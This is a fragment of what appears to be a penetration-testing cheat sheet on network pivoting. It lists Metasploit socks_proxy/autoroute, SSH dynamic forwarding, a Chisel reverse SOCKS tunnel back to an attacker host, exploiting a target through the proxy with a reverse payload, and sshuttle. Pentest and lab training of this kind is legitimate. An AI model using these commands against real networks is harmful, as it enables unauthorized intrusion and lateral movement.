| ## Pivoting 1172 | ### Socks 1173 | 1174 | - Metasploit 1175 | ```bash 1176 | use socks_proxy 1177 | 1178 | set srvhost 127.0.0.1 1179 | 1180 | run 1181 | 1182 | use autoroute 1183 | 1184 | set session 1 1185 | 1186 | run 1187 | ``` 1188 | - SSH 1189 | ```bash 1190 | ssh root@192.168.90.101 -D 1080 1191 | ``` 1192 | - Chisel 1193 | 1194 | ```bash 1195 | chisel server -p 8080 --reverse 1196 | 1197 | chisel.exe client 10.10.14.91:8080 R:socks 1198 | ``` 1199 | - Exploit a vulnerability through SOCKS 1200 | ```bash 1201 | set lhost 10.10.14.91 1202 | 1203 | set rhost 10.9.15.11 1204 | 1205 | set lport 8443 1206 | 1207 | set proxies socks5:127.0.0.1:1080 1208 | 1209 | set payload …… 1210 | 1211 | set reverseallowproxy true 1212 | 1213 | run 1214 | ``` 1215 | 1216 | ### SSHuttle 1217 | ```bash 1218 | sshuttle -r bob@172.16.90.197 172.16.90.1/24 1219 | ``` 1220 | --------------------------------------------------------------------------------